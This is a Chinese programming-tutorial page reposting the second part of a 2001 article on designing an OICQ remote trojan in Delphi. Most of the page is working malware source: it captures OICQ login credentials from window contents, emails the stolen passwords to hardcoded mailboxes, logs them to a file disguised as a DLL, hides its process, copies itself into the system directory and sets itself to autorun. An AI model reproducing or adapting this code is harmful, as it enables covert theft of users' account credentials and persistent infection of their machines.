OICQ 远程木马的设计技术_Delphi程序_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

OICQ 远程木马的设计技术

作者：闵涛文章来源：闵涛的学习笔记点击数：1679 更新时间：2009/4/23 18:44:20

'''隐身'''');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
if hwold=old then
begin
if olde<>old then
begin
if strcomp(sbuf,sb2)=0 then items[2]:=''''登录成功:在线''''
else items[2]:=''''登录成功:隐身'''';
items[3]:='''' '''';
//密码发回我的邮箱getoicq@21cn.com

newpass:=format(''''%s %s %s %s'''',[items[0],items[1],items[2],items[3],items[4]);
//
hackmail:=email;
sendpass;
email:=''''mf001@etang.com'''';
sendpass;
email:=hackmail;

//密码存盘到oicqpass.dll中

{
if fileexists(spy+''''oicqpass.dll'''')=false then fhand:=filecreate(spy+''''oicqpass.dll'''')
else fhand:=fileopen(spy+''''oicqpass.dll'''',fmOpenWrite);
if fileexists(spy+''''oicqpass.dll'''')=false then fhand:=filecreate(spy+''''oicqpass.dll'''')
else fhand:=fileopen(spy+''''oicqpass.dll'''',fmOpenWrite);
fileseek(fhand,0,2);
strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10);
filewrite(fhand,sbuf,strlen(sbuf));
fileclose(fhand);
}
end;
olde:=old;
end;
end;
result:=true;
end;

定时器响应函数
procedure OnTimer1;
begin
lp:=0;
EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);
end;
//窗口创建响应函数
procedure winCreate;
var wlong:integer;
s1:string;
s2,s3,sbuf:array[0..300] of char;
i:integer;
osver:TOSVERSIONINFO;
tmp:tmemorystream;
begin
//取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能
osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO);
if GetVersionEx(osver)=true then
begin
if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then
begin
LibHandle:=LoadLibrary(''''kernel32.dll'''');
if LibHandle<>0 then
begin
@regservice:=GetProcAddress(LibHandle, ''''RegisterServiceProcess'''');
regservice(0,1);//1=hide,0=show;
FreeLibrary(LibHandle);
end;
end;
end;
max:=0;
count:=0;
将程序复制到系统目录
s1:=ParamStr(0);
for i:=0 to length(s1) do s2:=s1[i+1];
GetSystemDirectory(@syspath,MAX_PATH);
spy:=strpas(@syspath)+''''\'''';
s1:=spy+''''oicqhack.exe'''';
for i:=0 to length(s1) do s3:=s1[i+1];
copyfile(s2,s3,false);
//从email.txt中找到目标e-mail信箱
if fileexists(''''c:\email.txt'''')=false then
begin
email:=''''getoicq@21cn.com'''';
end else
begin
tmp:=tmemorystream.create;;
tmp.loadfromfile(''''c:\email.txt'''');
count:=tmp.size;
// strcopy(sbuf,pchar(''''''''));
tmp.read(sbuf,count);
tmp.free;
email:='''''''';
for step:=0 to count-1 do email:=email+sbuf[step];
strcopy(sbuf,pchar(email));
// messagebox(0,sbuf,'''''''',0);
end;
count:=0;
step:=0;
//修改注册表使程序自启动
autorun;
end;

end.

/////////////////////////////////////////////////////////
--------倪建华---------------
HackSoft Research Lab.
Copyright(C) 2001 Alrights reserved.

上一页 [1] [2]

[聊天工具]OICQ 2000武器篇  [聊天工具]OICQ 2000大法
[Delphi程序]用DELPHI给OICQ动手术(二)  [Delphi程序]用DELPHI给OICQ动手术(一)
[网络应用]oicq的攻与防小全

教程录入：mintao 责任编辑：mintao

上一篇教程： win32下的系统日志钩子示例程序(Delphi 版)

下一篇教程： Delphi中Hook技术全接触

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· C语言系列 · VB.NET程序
· JAVA开发 · Delphi程序
· 脚本语言

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……